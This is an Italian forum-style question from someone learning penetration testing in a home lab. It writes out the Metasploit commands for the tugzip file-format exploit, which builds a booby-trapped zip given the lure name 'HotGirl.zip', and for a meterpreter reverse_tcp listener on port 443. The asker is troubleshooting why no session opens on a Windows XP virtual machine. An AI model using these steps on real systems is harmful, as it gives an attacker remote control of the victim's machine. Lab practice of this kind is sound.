Bene, sto imparando a fare il pentest con Metasploit e stavo usando un exploit di nome "tugzip" che usa un protocollo rever_tcp così ho effettivamente installato Kali linux sul mio computer e ho usato una macchina virtuale con Windows XP. Quindi per prima cosa configuro il tugzip in questo modo:
use exploit/windows/fileformat/tugzip
set FILENAME HotGirl.zip
set LHOST 172.16.98.1(IP that i could ping from my VM that i assume it was mine)
set LPORT 443
exploit
Ho spostato il file che ho creato nella sessione VM di Windows XP, quindi provo ad avviare un listener, così ho fatto:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 172.16.98.1
set LPORT 443
quindi apparentemente tutto va bene perché mi mostra questo:
[*] Exploit running as background job 3.
[*] Started reverse TCP handler on 172.16.98.1:443
Ma quando ho aperto il file HotGirl.zip sul mio Windows XP VM non aprirò una nuova sessione su Metasploit, non so che non stia succedendo nulla.
P.S. Sto usando VirtualBox